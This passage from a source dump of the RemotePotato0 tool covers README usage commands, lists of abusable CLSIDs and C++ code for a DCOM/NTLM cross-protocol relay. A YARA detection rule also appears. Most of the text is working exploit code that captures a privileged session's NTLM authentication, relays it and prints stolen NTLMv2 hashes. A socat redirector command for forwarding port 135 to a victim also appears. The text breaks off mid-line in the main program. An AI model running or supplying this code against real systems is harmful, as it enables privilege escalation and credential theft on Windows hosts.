31 | 32 | ``` 33 | query user 34 | .\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1 35 | ``` 36 | 37 | #### Module 1 - Rpc2Http cross protocol relay server 38 | ``` 39 | .\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20 40 | ``` 41 | 42 | ``` 43 | rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm 44 | ``` 45 | 46 | #### Module 2 - Rpc capture (hash) server + potato trigger 47 | ``` 48 | query user 49 | .\RemotePotato0.exe -m 2 -s 1 50 | ``` 51 | 52 | #### Module 3 - Rpc capture (hash) server 53 | ``` 54 | .\RemotePotato0.exe -m 3 -l 9997 55 | ``` 56 | 57 | ``` 58 | rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm 59 | ``` 60 | ## Usage 61 | 62 | ``` 63 | 64 | 65 | RemotePotato0 66 | @splinter_code & @decoder_it 67 | 68 | 69 | 70 | Mandatory args: 71 | -m module 72 | Allowed values: 73 | 0 - Rpc2Http cross protocol relay server + potato trigger (default) 74 | 1 - Rpc2Http cross protocol relay server 75 | 2 - Rpc capture (hash) server + potato trigger 76 | 3 - Rpc capture (hash) server 77 | 78 | 79 | Other args: (someone could be mandatory and/or optional based on the module you use) 80 | -r Remote HTTP relay server ip 81 | -t Remote HTTP relay server port (Default 80) 82 | -x Rogue Oxid Resolver ip (default 127.0.0.1) 83 | -p Rogue Oxid Resolver port (default 9999) 84 | -l RPC Relay server listening port (Default 9997) 85 | -s Session id for the Cross Session Activation attack (default disabled) 86 | -c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54}) 87 | ``` 88 | 89 | 90 | ## Demo 91 | 92 | ### Cross session activation 93 | 94 | 95 | ### Hash Stealer 96 | 97 | 98 | ## CLSID List 99 | 100 | A list of usable CLSID on various Windows version: 101 | 102 | Windows Server 2019 103 | ``` 104 | {0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class 105 | {0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 106 | {5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 107 | {924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients 108 | {934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog 109 | {BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 110 | {c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host 111 | {f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory 112 | {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class 113 | {f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser 114 | ``` 115 | 116 | Windows Server 2016 117 | ``` 118 | {924DC564-16A6-42EB-929A-9A61FA7DA06F} 119 | {f65817c8-dd85-4136-89f0-b9d12939f2c4} 120 | {BA441419-0B3F-4FB6-A903-D16CC14CCA44} 121 | {0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} 122 | {934b410c-43e4-415e-9935-fbc081ba93a9} 123 | {f8842f8e-dafe-4b37-9d38-4e0714a61149} 124 | {0002DF02-0000-0000-C000-000000000046} 125 | {5167B42F-C111-47A1-ACC4-8EABE61B0B54} 126 | {c58ca859-80bc-48df-8f06-ffa94a405bff} 127 | {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 128 | ``` 129 | 130 | Windows Server 2008 R2 131 | ``` 132 | {FCC74B77-EC3E-4dd8-A80B-008A702075A9} 133 | {9BA05972-F6A8-11CF-A442-00A0C90A8F39} 134 | {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 135 | ``` 136 | 137 | 138 | You can find a more complete list here --> http://ohpe.it/juicy-potato/CLSID/ 139 | 140 | ## Detection 141 | 142 | Yara rule to detect RemotePotato0 binary: 143 | 144 | ``` 145 | rule SentinelOne_RemotePotato0_privesc { 146 | meta: 147 | author = "SentinelOne" 148 | description = "Detects RemotePotato0 binary" 149 | reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop" 150 | 151 | strings: 152 | $import1 = "CoGetInstanceFromIStorage" 153 | $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii 154 | $meow_header = { 4d 45 4f 57 } 155 | $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii 156 | $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii 157 | 158 | condition: 159 | (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*) 160 | } 161 | ``` 162 | 163 | ## Authors 164 | 165 | * [Antonio Cocomazzi](https://twitter.com/splinter_code) 166 | * [Andrea Pierini](https://twitter.com/decoder_it) 167 | 168 | ## Credits 169 | 170 | * [Impacket](https://github.com/SecureAuthCorp/impacket) 171 | * [@tiraniddo](https://twitter.com/tiraniddo) - [Cross Session Activation](https://www.tiraniddo.dev/2021/04/standard-activating-yourself-to.html) 172 | * [@Responder](https://github.com/lgandx/Responder) 173 | 174 | ## References 175 | - https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop/ 176 | - https://www.tiraniddo.dev/2021/04/standard-activating-yourself-to.html 177 | -------------------------------------------------------------------------------- /RPCCaptureServer.cpp: -------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | #define WIN32_LEAN_AND_MEAN 3 | 4 | #include "Windows.h" 5 | #include "stdio.h" 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include "RPCCaptureServer.h" 12 | #include "RelayLib.h" 13 | 14 | #pragma comment (lib, "Ws2_32.lib") 15 | #pragma comment (lib, "Secur32.Lib") 16 | 17 | #pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS 18 | 19 | #define DEFAULT_BUFLEN 8192 20 | 21 | #define NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH 8 22 | #define NTLMv2_TYPE2_SERVER_CHALLENGE_OFFSET 24 23 | #define NTLMv2_TYPE2_RESERVED_OFFSET 32 24 | #define NTLMv2_TYPE3_NTPROOFSTR_LENGTH 16 25 | #define NTLMv2_TYPE3_RESPONSE_LENGTH_OFFSET 20 26 | #define NTLMv2_TYPE3_RESPONSE_OFFSET_OFFSET 24 27 | 28 | extern BOOL g_SuccessTrigger; 29 | 30 | void DoRpcServerCaptureCredsHash(wchar_t* rpcServerIp, wchar_t* rpcServerPort, wchar_t* rpcRelayServerListeningPort) { 31 | int iResult = 0; 32 | int ntlmIndex = 0; 33 | int recvbuflen = DEFAULT_BUFLEN; 34 | int sendbuflen = DEFAULT_BUFLEN; 35 | char sendbuf[DEFAULT_BUFLEN]; 36 | char recvbuf[DEFAULT_BUFLEN]; 37 | char ntlmType1[DEFAULT_BUFLEN]; 38 | char ntlmType2[DEFAULT_BUFLEN]; 39 | int ntlmType2Len = 0; 40 | char ntlmType3[DEFAULT_BUFLEN]; 41 | int ntlmType3Len = 0; 42 | char type1BakBuffer[DEFAULT_BUFLEN]; 43 | int type1BakLen = 0; 44 | 45 | SOCKET RPCSocketListen = CreateRPCSocketListen(rpcRelayServerListeningPort); 46 | SOCKET RPCSocketReflect = CreateRPCSocketReflect(rpcServerIp, rpcServerPort); 47 | 48 | do { 49 | iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0); 50 | ntlmIndex = findNTLMBytes(recvbuf, iResult); 51 | // if the rpc packet contains ntlm auth information we do our magic (cross protocol relay) 52 | if (ntlmIndex > 0) { 53 | // save the rpc packet of type1 authentication to forward it later to the fake RPC server (we reuse the RogueOxidResolver) 54 | memcpy(type1BakBuffer, recvbuf, iResult); 55 | type1BakLen = iResult; 56 | // copy in ntlmType1 the extracted auth information from the received buffer 57 | memcpy(ntlmType1, recvbuf + ntlmIndex, iResult - ntlmIndex); 58 | // forge the ntlm type2 message using the win32 api 59 | ForgeNtlmType2(ntlmType1, iResult - ntlmIndex, ntlmType2, &ntlmType2Len); 60 | // here we zero'd out the Reserved field to force a remote authentication on localhost. If this value is not set to 0 the auth will be broken. 61 | memset(ntlmType2 + NTLMv2_TYPE2_RESERVED_OFFSET, 0, 8); 62 | // here we communicate with our fake RPC Server to have just the template for rpc packets, sending the type1 63 | if (send(RPCSocketReflect, type1BakBuffer, type1BakLen, 0) == SOCKET_ERROR) { 64 | printf("[!] Couldn't communicate with the fake RPC Server\n"); 65 | break; 66 | } 67 | // receiving the type2 message from the fake RPC Server to use as a template for our relayed auth 68 | iResult = recv(RPCSocketReflect, recvbuf, recvbuflen, 0); 69 | if (iResult == SOCKET_ERROR) { 70 | printf("[!] Couldn't receive the type2 message from the fake RPC Server\n"); 71 | break; 72 | } 73 | // get the ntlmindex from the type2 message received from the fake rpc server 74 | ntlmIndex = findNTLMBytes(recvbuf, iResult); 75 | // in this function we take the packet template from a real rpc server and we alter the authentication part, 76 | // in this case we change the original type2 with the type2 received by the http server. We also adjust the len of the rpc packet fragLen and authLen 77 | // to not break the rpc protocol 78 | ForgeAndAlterType2Rpc(recvbuf, iResult, ntlmIndex, ntlmType2, ntlmType2Len, sendbuf); 79 | // send the altered type2 to the rpc client (the privileged auth) 80 | if (send(RPCSocketListen, sendbuf, ntlmIndex + ntlmType2Len, 0) == SOCKET_ERROR) { 81 | printf("[!] Couldn't send the altered type2 to the rpc client (the privileged auth)\n"); 82 | break; 83 | } 84 | // receive the type3 auth from the rpc client. This is the privileged AUTH that the client is sending us 85 | iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0); 86 | if (iResult == SOCKET_ERROR) { 87 | printf("[!] Couldn't receive the type3 auth from the rpc client\n"); 88 | break; 89 | } 90 | // extract the type3 auth from the rpc packet 91 | ExtractType3FromRpc(recvbuf, iResult, ntlmType3, &ntlmType3Len); 92 | // now we extract all the required data to print the hash in the lc format: 93 | PrintCapturedHash(ntlmType2, ntlmType3); 94 | break; 95 | } 96 | } while (iResult > 0); 97 | closesocket(RPCSocketListen); 98 | closesocket(RPCSocketReflect); 99 | WSACleanup(); 100 | } 101 | 102 | void ForgeNtlmType2(char* ntlmType1, int ntlmType1Len, char* ntlmType2, int* ntlmType2Len) { 103 | CredHandle hCred; 104 | SecBufferDesc secClientBufferDesc, secServerBufferDesc; 105 | SecBuffer secClientBuffer, secServerBuffer; 106 | PCtxtHandle phContext; 107 | 108 | TCHAR lpPackageName[1024] = L"NTLM"; 109 | TimeStamp ptsExpiry; 110 | 111 | int status = AcquireCredentialsHandle( 112 | NULL, 113 | lpPackageName, 114 | SECPKG_CRED_INBOUND, 115 | NULL, 116 | NULL, 117 | 0, 118 | NULL, 119 | &hCred, 120 | &ptsExpiry); 121 | 122 | if (status != SEC_E_OK) 123 | { 124 | printf("Error in AquireCredentialsHandle\n"); 125 | return; 126 | } 127 | 128 | InitTokenContextBuffer(&secClientBufferDesc, &secClientBuffer); 129 | InitTokenContextBuffer(&secServerBufferDesc, &secServerBuffer); 130 | 131 | phContext = new CtxtHandle(); 132 | 133 | secClientBuffer.cbBuffer = static_cast(ntlmType1Len); 134 | secClientBuffer.pvBuffer = ntlmType1; 135 | 136 | ULONG fContextAttr; 137 | TimeStamp tsContextExpiry; 138 | 139 | status = AcceptSecurityContext( 140 | &hCred, 141 | nullptr, 142 | &secClientBufferDesc, 143 | ASC_REQ_ALLOCATE_MEMORY, 144 | SECURITY_NATIVE_DREP, 145 | phContext, 146 | &secServerBufferDesc, 147 | &fContextAttr, 148 | &tsContextExpiry); 149 | 150 | *ntlmType2Len = secServerBuffer.cbBuffer; 151 | memcpy(ntlmType2, (char*)secServerBuffer.pvBuffer, secServerBuffer.cbBuffer); 152 | } 153 | 154 | void InitTokenContextBuffer(PSecBufferDesc pSecBufferDesc, PSecBuffer pSecBuffer) 155 | { 156 | pSecBuffer->BufferType = SECBUFFER_TOKEN; 157 | pSecBuffer->cbBuffer = 0; 158 | pSecBuffer->pvBuffer = nullptr; 159 | 160 | pSecBufferDesc->ulVersion = SECBUFFER_VERSION; 161 | pSecBufferDesc->cBuffers = 1; 162 | pSecBufferDesc->pBuffers = pSecBuffer; 163 | } 164 | 165 | void PrintCapturedHash(char *ntlmType2, char* ntlmType3) { 166 | unsigned char serverChallenge[8]; 167 | unsigned char NTProofStr[16]; 168 | unsigned char NTLMResponse[268]; 169 | int* ntlmType3Offset; 170 | unsigned short* ntlmType3Length; 171 | 172 | short* domainLen, * userLen, * hostnameLen; 173 | __int32* domainOffset, * userOffset, * hostnameOffset; 174 | wchar_t domain[32], user[32], hostname[32]; 175 | 176 | // parsing user info 177 | domainLen = (short*)(ntlmType3 + 28); 178 | userLen = (short*)(ntlmType3 + 36); 179 | hostnameLen = (short*)(ntlmType3 + 44); 180 | domainOffset = (__int32*)(ntlmType3 + 32); 181 | userOffset = (__int32*)(ntlmType3 + 40); 182 | hostnameOffset = (__int32*)(ntlmType3 + 48); 183 | memset(domain, 0, 32); 184 | memcpy(domain, ntlmType3 + (*domainOffset), *domainLen); 185 | memset(user, 0, 32); 186 | memcpy(user, ntlmType3 + (*userOffset), *userLen); 187 | memset(hostname, 0, 32); 188 | memcpy(hostname, ntlmType3 + (*hostnameOffset), *hostnameLen); 189 | 190 | // parsing captured hash 191 | memcpy(serverChallenge, &ntlmType2[NTLMv2_TYPE2_SERVER_CHALLENGE_OFFSET], NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH); 192 | ntlmType3Length = (unsigned short*)(ntlmType3 + NTLMv2_TYPE3_RESPONSE_LENGTH_OFFSET); 193 | ntlmType3Offset = (int*)(ntlmType3 + NTLMv2_TYPE3_RESPONSE_OFFSET_OFFSET); 194 | memcpy(NTProofStr, &ntlmType3[*ntlmType3Offset], NTLMv2_TYPE3_NTPROOFSTR_LENGTH); 195 | memcpy(NTLMResponse, &ntlmType3[(*ntlmType3Offset) + NTLMv2_TYPE3_NTPROOFSTR_LENGTH], *ntlmType3Length- NTLMv2_TYPE3_NTPROOFSTR_LENGTH); 196 | 197 | if (wcslen(user) < 2) { 198 | printf("[!] Couldn't capture the user credential hash :(\n"); 199 | return; 200 | } 201 | 202 | g_SuccessTrigger = TRUE; 203 | 204 | // printing the golden data, format inspired by Responder :D 205 | printf("[+] User hash stolen!\n"); 206 | printf("\n"); 207 | printf("NTLMv2 Client\t: %S\n", hostname); 208 | printf("NTLMv2 Username\t: %S\\%S\n", domain, user); 209 | printf("NTLMv2 Hash\t: %S::%S:", user, domain); 210 | for (int i = 0; i < NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH; i++) 211 | printf("%02x", serverChallenge[i]); 212 | printf(":"); 213 | for (int i = 0; i < NTLMv2_TYPE3_NTPROOFSTR_LENGTH; i++) 214 | printf("%02x", NTProofStr[i]); 215 | printf(":"); 216 | for (int i = 0; i < *ntlmType3Length - NTLMv2_TYPE3_NTPROOFSTR_LENGTH; i++) 217 | printf("%02x", NTLMResponse[i]); 218 | printf("\n\n"); 219 | //hexDump2((char*)"\nserverChallenge\n", serverChallenge, NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH); 220 | //hexDump2((char*)"\nNTProofStr\n", NTProofStr, NTLMv2_TYPE3_NTPROOFSTR_LENGTH); 221 | //hexDump2((char*)"\nNTLMResponse\n", NTLMResponse, *ntlmType3Length - NTLMv2_TYPE3_NTPROOFSTR_LENGTH); 222 | } 223 | -------------------------------------------------------------------------------- /RPCCaptureServer.h: -------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | 3 | #pragma once 4 | #include 5 | 6 | void ForgeNtlmType2(char*, int, char*, int*); 7 | void InitTokenContextBuffer(PSecBufferDesc, PSecBuffer); 8 | void PrintCapturedHash(char*, char*); 9 | void DoRpcServerCaptureCredsHash(wchar_t*, wchar_t*, wchar_t*); -------------------------------------------------------------------------------- /RelayLib.cpp: -------------------------------------------------------------------------------- 1 | #define WIN32_LEAN_AND_MEAN 2 | 3 | #include "Windows.h" 4 | #include "stdio.h" 5 | #include 6 | #include 7 | #include 8 | #include "RelayLib.h" 9 | 10 | #pragma comment (lib, "Ws2_32.lib") 11 | 12 | #pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS 13 | 14 | SOCKET CreateRPCSocketListen(const wchar_t* listenport) { 15 | WSADATA wsaData; 16 | int iResult; 17 | char listen_port_a[12]; 18 | 19 | SOCKET ListenSocket = INVALID_SOCKET; 20 | SOCKET ClientSocket = INVALID_SOCKET; 21 | 22 | struct addrinfo* result = NULL; 23 | struct addrinfo hints; 24 | 25 | // Initialize Winsock 26 | iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); 27 | if (iResult != 0) { 28 | printf("WSAStartup failed with error: %d\n", iResult); 29 | exit(-1); 30 | } 31 | 32 | ZeroMemory(&hints, sizeof(hints)); 33 | hints.ai_family = AF_INET; 34 | hints.ai_socktype = SOCK_STREAM; 35 | hints.ai_protocol = IPPROTO_TCP; 36 | hints.ai_flags = AI_PASSIVE; 37 | 38 | memset(listen_port_a, 0, 12); 39 | wcstombs(listen_port_a, listenport, 12); 40 | 41 | // Resolve the server address and port 42 | iResult = getaddrinfo(NULL, listen_port_a, &hints, &result); 43 | if (iResult != 0) { 44 | printf("getaddrinfo failed with error: %d\n", iResult); 45 | WSACleanup(); 46 | exit(-1); 47 | } 48 | 49 | // Create a SOCKET for connecting to server 50 | ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); 51 | if (ListenSocket == INVALID_SOCKET) { 52 | printf("socket failed with error: %ld\n", WSAGetLastError()); 53 | freeaddrinfo(result); 54 | WSACleanup(); 55 | exit(-1); 56 | } 57 | 58 | // Setup the TCP listening socket 59 | iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); 60 | if (iResult == SOCKET_ERROR) { 61 | printf("bind failed with error: %d\n", WSAGetLastError()); 62 | freeaddrinfo(result); 63 | closesocket(ListenSocket); 64 | WSACleanup(); 65 | exit(-1); 66 | } 67 | 68 | freeaddrinfo(result); 69 | 70 | printf("[*] RPC relay server listening on port %S ...\n", listenport); 71 | iResult = listen(ListenSocket, SOMAXCONN); 72 | if (iResult == SOCKET_ERROR) { 73 | printf("listen failed with error: %d\n", WSAGetLastError()); 74 | closesocket(ListenSocket); 75 | WSACleanup(); 76 | exit(-1); 77 | } 78 | 79 | // Accept a client socket 80 | ClientSocket = accept(ListenSocket, (sockaddr*)NULL, (int*)NULL); 81 | if (ClientSocket == INVALID_SOCKET) { 82 | printf("accept failed with error: %d\n", WSAGetLastError()); 83 | closesocket(ListenSocket); 84 | WSACleanup(); 85 | exit(-1); 86 | } 87 | printf("[+] Received the relayed authentication on the RPC relay server on port %S\n", listenport); 88 | // No longer need server socket 89 | closesocket(ListenSocket); 90 | return ClientSocket; 91 | } 92 | 93 | SOCKET CreateRPCSocketReflect(const wchar_t* remoteRPCIp, const wchar_t* remoteRPCport) { 94 | //---------------------- 95 | // Initialize Winsock 96 | 97 | char remoteRPCIp_a[20]; 98 | char remoteRPCport_a[12]; 99 | int remotePort; 100 | WSADATA wsaData; 101 | int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); 102 | if (iResult != NO_ERROR) { 103 | wprintf(L"WSAStartup function failed with error: %d\n", iResult); 104 | return 1; 105 | } 106 | //---------------------- 107 | // Create a SOCKET for connecting to server 108 | SOCKET ConnectSocket; 109 | ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 110 | if (ConnectSocket == INVALID_SOCKET) { 111 | wprintf(L"socket function failed with error: %ld\n", WSAGetLastError()); 112 | WSACleanup(); 113 | return 1; 114 | } 115 | //---------------------- 116 | // The sockaddr_in structure specifies the address family, 117 | // IP address, and port of the server to be connected to. 118 | 119 | memset(remoteRPCport_a, 0, 12); 120 | wcstombs(remoteRPCport_a, remoteRPCport, 12); 121 | memset(remoteRPCIp_a, 0, 20); 122 | wcstombs(remoteRPCIp_a, remoteRPCIp, 20); 123 | remotePort = atoi(remoteRPCport_a); 124 | sockaddr_in clientService; 125 | clientService.sin_family = AF_INET; 126 | clientService.sin_addr.s_addr = inet_addr(remoteRPCIp_a); 127 | clientService.sin_port = htons(remotePort); 128 | 129 | //---------------------- 130 | // Connect to server. 131 | iResult = connect(ConnectSocket, (SOCKADDR*)& clientService, sizeof(clientService)); 132 | if (iResult == SOCKET_ERROR) { 133 | wprintf(L"CreateRPCSocketReflect: connect function failed with error: %ld\n", WSAGetLastError()); 134 | printf("Couldn't connect to RPC Server %S on port %S\n", remoteRPCIp, remoteRPCport); 135 | iResult = closesocket(ConnectSocket); 136 | if (iResult == SOCKET_ERROR) 137 | wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError()); 138 | WSACleanup(); 139 | return 1; 140 | } 141 | 142 | printf("[*] Connected to RPC Server %S on port %S\n", remoteRPCIp, remoteRPCport); 143 | return ConnectSocket; 144 | } 145 | 146 | void ForgeAndAlterType2Rpc(char* rpcType2Packet, int rpcType2PacketLen, int authIndexStart, char* ntlmType2, int ntlmType2Len, char* newRpcType2Packet) { 147 | short* fragLen = (short*)rpcType2Packet + 4; 148 | short* authLen = (short*)rpcType2Packet + 5; 149 | int ntlmPacketLen = rpcType2PacketLen - authIndexStart; 150 | *fragLen = *fragLen - ntlmPacketLen + ntlmType2Len; 151 | *authLen = ntlmType2Len; 152 | memcpy(newRpcType2Packet, rpcType2Packet, authIndexStart); 153 | memcpy(newRpcType2Packet + authIndexStart, ntlmType2, ntlmType2Len); 154 | } 155 | 156 | void ExtractType3FromRpc(char* rpcPacket, int rpcPacketLen, char* ntlmType3, int* ntlmType3Len) { 157 | int ntlmIndex = findNTLMBytes(rpcPacket, rpcPacketLen); 158 | short* authLen = (short*)rpcPacket + 5; 159 | memcpy(ntlmType3, rpcPacket + ntlmIndex, *authLen); 160 | *ntlmType3Len = (int)* authLen; 161 | } 162 | 163 | int findNTLMBytes(char* bytes, int len) { 164 | //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header. 165 | //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header, 166 | //we can just return the index 167 | char pattern[7] = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 }; 168 | int pIdx = 0; 169 | int i; 170 | for (i = 0; i < len; i++) { 171 | if (bytes[i] == pattern[pIdx]) { 172 | pIdx = pIdx + 1; 173 | if (pIdx == 7) return (i - 6); 174 | } 175 | else { 176 | pIdx = 0; 177 | } 178 | } 179 | return -1; 180 | } 181 | 182 | //debug 183 | void hexDump2(char* desc, void* addr, int len) { 184 | int i; 185 | unsigned char buff[17]; 186 | unsigned char* pc = (unsigned char*)addr; 187 | 188 | // Output description if given. 189 | if (desc != NULL) 190 | printf("%s:\n", desc); 191 | 192 | if (len == 0) { 193 | printf(" ZERO LENGTH\n"); 194 | return; 195 | } 196 | if (len < 0) { 197 | printf(" NEGATIVE LENGTH: %i\n", len); 198 | return; 199 | } 200 | 201 | // Process every byte in the data. 202 | for (i = 0; i < len; i++) { 203 | // Multiple of 16 means new line (with line offset). 204 | 205 | if ((i % 16) == 0) { 206 | // Just don't print ASCII for the zeroth line. 207 | if (i != 0) 208 | printf(" %s\n", buff); 209 | 210 | // Output the offset. 211 | printf(" %04x ", i); 212 | } 213 | 214 | // Now the hex code for the specific character. 215 | printf(" %02x", pc[i]); 216 | 217 | // And store a printable ASCII character for later. 218 | if ((pc[i] < 0x20) || (pc[i] > 0x7e)) 219 | buff[i % 16] = '.'; 220 | else 221 | buff[i % 16] = pc[i]; 222 | buff[(i % 16) + 1] = '\0'; 223 | } 224 | 225 | // Pad out last line if not exactly 16 characters. 226 | while ((i % 16) != 0) { 227 | printf(" "); 228 | i++; 229 | } 230 | 231 | // And print the final ASCII bit. 232 | printf(" %s\n", buff); 233 | } 234 | -------------------------------------------------------------------------------- /RelayLib.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "Windows.h" 3 | 4 | SOCKET CreateRPCSocketListen(const wchar_t*); 5 | SOCKET CreateRPCSocketReflect(const wchar_t*, const wchar_t*); 6 | void ForgeAndAlterType2Rpc(char*, int, int, char*, int, char*); 7 | void ExtractType3FromRpc(char*, int, char*, int*); 8 | int findNTLMBytes(char*, int); 9 | 10 | //debug 11 | void hexDump2(char*, void*, int); -------------------------------------------------------------------------------- /RemotePotato0.cpp: -------------------------------------------------------------------------------- 1 | #include "Windows.h" 2 | #include "stdio.h" 3 | #include "HTTPCrossProtocolRelay.h" 4 | #include "RPCCaptureServer.h" 5 | #include "RogueOxidResolver.h" 6 | #include "IStorageTrigger.h" 7 | #include "RogueOxidResolver_h.h" 8 | #include "IStandardActivator_h.h" 9 | #include 10 | 11 | int g_sessionID=-1; 12 | wchar_t* g_rpcRelayServerListeningPort; 13 | wchar_t* rogueOxidResolverIp; 14 | wchar_t* rogueOxidResolverPort; 15 | bool juicyPotatoCompatible; 16 | 17 | BOOL g_SuccessTrigger = FALSE; 18 | 19 | DWORD WINAPI ThreadRogueOxidResolver(LPVOID lpParam); 20 | DWORD WINAPI ThreadHTTPCrossProtocolRelay(LPVOID lpParam); 21 | DWORD WINAPI ThreadRpcServerCaptureCredsHash(LPVOID lpParam); 22 | void TriggerDCOM(wchar_t*); 23 | void TriggerDCOMWithSessionID(wchar_t*); 24 | void usage(); 25 | BOOL IsJuicyPotatoCompatible(); 26 | 27 | typedef NTSTATUS(NTAPI* pRtlGetVersion)(OSVERSIONINFOEX* lpVersionInformation); 28 | 29 | struct THREAD_PARAMETERS 30 | { 31 | wchar_t* remoteHTTPRelayServerIp; 32 | wchar_t* remoteHTTPRelayServerPort; 33 | wchar_t* rpcServerIpReflection; 34 | wchar_t* rpcServerPortReflection; 35 | wchar_t* rpcRelayServerListeningPort; 36 | }; 37 | 38 | 39 | int wmain(int argc, wchar_t** argv) 40 | { 41 | int fModule = -1; 42 | wchar_t defaultRemoteHTTPRelayServerPort[] = L"80"; 43 | wchar_t defaultRogueOxidResolverIp[] = L"127.0.0.1"; 44 | wchar_t defaultRogueOxidResolverPort[] = L"9999"; 45 | wchar_t defaultRpcRelayServerListeningPort[] = L"9997"; 46 | wchar_t defaultClsid[] = L"{5167B42F-C111-47A1-ACC4-8EABE61B0B54}"; 47 | wchar_t* remoteHTTPRelayServerIp = NULL; 48 | wchar_t* remoteHTTPRelayServerPort = defaultRemoteHTTPRelayServerPort; 49 | wchar_t* rpcRelayServerListeningPort = defaultRpcRelayServerListeningPort; 50 | wchar_t* clsid = defaultClsid; 51 | rogueOxidResolverIp = defaultRogueOxidResolverIp; 52 | rogueOxidResolverPort = defaultRogueOxidResolverPort; 53 | 54 | int cnt = 1; 55 | while ((argc > 1) && (argv[cnt][0] == '-')) 56 | { 57 | 58 | switch (argv[cnt][1]) 59 | { 60 | 61 | case 'm': 62 | ++cnt; 63 | --argc; 64 | fModule = _wtoi(argv[cnt]); 65 | break; 66 | 67 | case 'r': 68 | ++cnt; 69 | --argc; 70 | remoteHTTPRelayServerIp = argv[cnt]; 71 | break; 72 | 73 | case 't': 74 | ++cnt; 75 | --argc; 76 | remoteHTTPRelayServerPort = argv[cnt]; 77 | break; 78 | 79 | case 'l': 80 | ++cnt; 81 | --argc; 82 | rpcRelayServerListeningPort = argv[cnt]; 83 | break; 84 | 85 | case 's': 86 | ++cnt; 87 | --argc; 88 | g_sessionID = _wtoi(argv[cnt]); 89 | break; 90 | 91 | case 'c': 92 | ++cnt; 93 | --argc; 94 | clsid = argv[cnt]; 95 | break; 96 | 97 | case 'p': 98 | ++cnt; 99 | --argc; 100 | rogueOxidResolverPort = argv[cnt]; 101 | break; 102 | 103 | case 'x': 104 | ++cnt; 105 | --argc; 106 | rogueOxidResolverIp = argv[cnt]; 107 | break; 108 | 109 | case 'h': 110 | usage(); 111 | exit(0); 112 | 113 | default: 114 | printf("Wrong Argument: %S\n", argv[cnt]); 115 | usage(); 116 | exit(-1); 117 | } 118 | ++cnt; 119 | --argc; 120 | } 121 | 122 | if (fModule == -1) { 123 | usage(); 124 | exit(-1); 125 | } 126 | 127 | THREAD_PARAMETERS threads_params = {}; 128 | threads_params.remoteHTTPRelayServerIp = remoteHTTPRelayServerIp; 129 | threads_params.remoteHTTPRelayServerPort = remoteHTTPRelayServerPort; 130 | threads_params.rpcServerIpReflection = defaultRogueOxidResolverIp; 131 | threads_params.rpcServerPortReflection = rogueOxidResolverPort; 132 | threads_params.rpcRelayServerListeningPort = rpcRelayServerListeningPort; 133 | HANDLE hThreadServer; 134 | 135 | if (fModule == 0 || fModule == 2) { 136 | g_rpcRelayServerListeningPort = rpcRelayServerListeningPort; 137 | CreateThread(NULL, 0, ThreadRogueOxidResolver, (LPVOID)rogueOxidResolverPort, 0, NULL); 138 | if (IsJuicyPotatoCompatible()) { 139 | printf("[*] Detected a Windows Server version compatible with JuicyPotato. RogueOxidResolver can be run locally on 127.0.0.1\n"); 140 | juicyPotatoCompatible = true; 141 | } 142 | else 143 | { 144 | if (rogueOxidResolverIp == defaultRogueOxidResolverIp) { 145 | printf("[!] Detected a Windows Server version not compatible with JuicyPotato, you cannot run the RogueOxidResolver on 127.0.0.1. RogueOxidResolver must be run remotely.\n"); 146 | printf("[!] Example Network redirector: \n\tsudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:%S\n", rogueOxidResolverPort); 147 | exit(-1); 148 | } 149 | printf("[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on %S to your victim machine on port %S\n", remoteHTTPRelayServerIp, rogueOxidResolverPort); 150 | printf("[*] Example Network redirector: \n\tsudo socat -v TCP-LISTEN:135,fork,reuseaddr 